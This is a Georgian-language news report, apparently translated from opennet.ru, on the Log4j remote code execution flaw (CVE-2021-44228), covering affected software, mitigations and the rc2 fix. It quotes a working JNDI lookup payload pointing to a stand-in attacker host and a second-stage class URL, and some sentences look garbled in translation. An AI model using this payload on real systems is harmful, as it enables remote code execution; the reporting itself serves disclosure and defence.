Apache Log4j-แจแ, Java แแแแแแแชแแแแจแ แจแแกแแแแก แแ แแแแแแแแแก แแแแฃแแแ แฃแ แฉแแ แฉแแจแ, แแแแแขแแคแแชแแ แแแฃแแแ แแ แแขแแแฃแแ แแแฃแชแแแแแแ, แ แแแแแแช แกแแจแฃแแแแแแก แแซแแแแก แแแแแแแแฃแ แ แแแแแก แจแแกแ แฃแแแแแก, แ แแแแกแแช แกแแแชแแแแฃแ แแ แคแแ แแแขแแ แแแฃแแ แแแแจแแแแแแแ โ{jndi:URL}โ แคแแ แแแขแจแ แฉแแแฌแแ แแแ แแฃแ แแแแจแ. แจแแขแแแ แจแแแซแแแแ แแแแฎแแ แชแแแแแแก Java แแแแแแแชแแแแแ, แ แแแแแแแช แแแ แ แฌแงแแ แแแแแแแ แแแฆแแแฃแ แแแแจแแแแแแแแแก แแฌแแ แแ, แแแแแแแแแ, แจแแชแแแแแก แจแแขแงแแแแแแแแแจแ แแ แแแแแแฃแ แ แแแแจแแแแแแแแแแก แฉแแแแแแแกแแก.
แแฆแแแจแแฃแแแ, แ แแ แแแแฅแแแก แงแแแแ แแ แแแฅแขแ, แ แแแแแแช แแงแแแแแก แฉแแ แฉแแแแก, แ แแแแ แแชแแ Apache Struts, Apache Solr, Apache Druid แแ Apache Flink, แแ แแก แแ แแแแแแ, แแแ แจแแ แแก Steam, Apple iCloud, Minecraft แแแแแแขแแแ แแ แกแแ แแแ แแแ. แแแกแแแแแแแแแ, แ แแ แแแฃแชแแแแแแแ แจแแแซแแแแ แแแแแแฌแแแแก แแแ แแแ แแขแแฃแ แแแแแแแชแแแแแ แแแกแแฃแ แ แแแแแแกแฎแแแแแก แขแแแฆแ, แ แแแแแแช แแแแแ แแแก แแ แแขแแแฃแแ แแแฃแชแแแแแแแก แแกแขแแ แแแก Apache Struts แฉแแ แฉแแจแ, แ แแแแแแช, แฃแฎแแจแ แจแแคแแกแแแแ, แแแแแแงแแแแแ แแแ แแแแแแแชแแแแจแ Fortune-แแก 65%-แแ. 100 แแแแแแแแ, แแแ แจแแ แแก แฅแกแแแแก แแแฃแชแแแแ แกแแกแขแแแแแแก แกแแแแแ แแแแก แแชแแแแแแแแ.
แแ แแแแแแแก แแกแแช แแแซแแแแแก, แ แแ แกแแแฃแจแแ แแฅแกแแแแแขแ แฃแแแ แแแแแฅแแแงแแแแฃแแแ, แแแแ แแ แกแขแแแแแฃแ แ แคแแแแแแแแแก แจแแกแฌแแ แแแแแ แฏแแ แแ แแ แแก แจแแแแแแแแ. CVE แแแแแขแแคแแแแขแแ แ แฏแแ แแ แแ แแก แแแแแญแแแฃแแ. แแแคแแฅแกแแ แแแ แจแแแแก แแฎแแแแ log4j-2.15.0-rc1 แกแแขแแกแขแ แคแแแแแแจแ. แ แแแแ แช แแแฃแชแแแแแแแก แแแแแแแแแก แแแแแกแแแแแ, แ แแแแแแแแแแฃแแแ log4j2.formatMsgNoLookups แแแ แแแแขแ แแก แแแงแแแแแ true.
แแ แแแแแแ แแแแแฌแแแฃแแ แแงแ แแแแ, แ แแ log4j แแฎแแ แก แฃแญแแ แก แกแแแชแแแแฃแ แ แแแฆแแแแแก แแแแฃแจแแแแแแก โ{}โ แแฃแ แแแแจแ แแแแแแแแแแ แฎแแแแแจแ, แ แแแแแแจแแช JNDI (Java Naming and Directory Interface) แแแแฎแแแแแแแก แจแแกแ แฃแแแแ แจแแแซแแแแแแ. แจแแขแแแ แแแแแ แแแแ แกแขแ แแฅแแแแก แแแแแชแแแแ โ${jndi:ldap://attacker.com/a}โ แฉแแแแชแแแแแแ, แ แแแแแก แแแแฃแจแแแแแแก แจแแแแแ log4j แแแแแแแแแก LDAP แแแแฎแแแแแก Java แแแแกแแกแแแ แแแแแแแ แแแแแ sulmer.com แกแแ แแแ แแ. . แแแแแแแกแฎแแแแแก แกแแ แแแ แแก แแแแ แแแแ แฃแแแแฃแแ แแแ (แแแแแแแแแ, http://second-stage.attacker.com/Exploit.class) แฉแแแขแแแ แแแแ แแ แจแแกแ แฃแแแแแ แแแแแแแแ แ แแ แแชแแกแแก แแแแขแแฅแกแขแจแ, แ แแช แกแแจแฃแแแแแแก แแซแแแแก แแแแแแแกแฎแแแแก แจแแแกแ แฃแแแก แแแแแแแแฃแ แ แแแแ แกแแกแขแแแ แแแแแแแแ แ แแแแแแแชแแแก แฃแคแแแแแแแ.
แแแแแ แแ 1: แแแฃแชแแแแแแแก แแแแแญแแแฃแแ แแฅแแก แแแแแขแแคแแแแขแแ แ CVE-2021-44228.
แแแแแ แแ 2: แแแแแขแแคแแชแแ แแแฃแแแ log4j-2.15.0-rc1 แแแแแจแแแแแก แแแแ แแแแแขแแแฃแแ แแแชแแแก แแแแ แแแก แแแแแ แแแ. แจแแแแแแแแแแแฃแแแ แแฎแแแ แแแแแฎแแแแ, log4j-2.15.0-rc2, แฃแคแ แ แกแ แฃแแงแแคแแแ แแแชแแแ แแแฃแชแแแแแแแกแแแ. แแแแ แฎแแแก แฃแกแแแแก แชแแแแแแแแก, แ แแแแแแช แแแแแแจแแ แแแฃแแแ แแ แแแแ แแแแฃแ แ แจแแฌแงแแแขแแก แแ แแ แกแแแแแแกแแแ แแ แแกแฌแแ แแ แคแแ แแแขแแ แแแฃแแ JNDI URL-แแก แแแแแงแแแแแแก แจแแแแฎแแแแแจแ.
แฌแงแแ แ: opennet.ru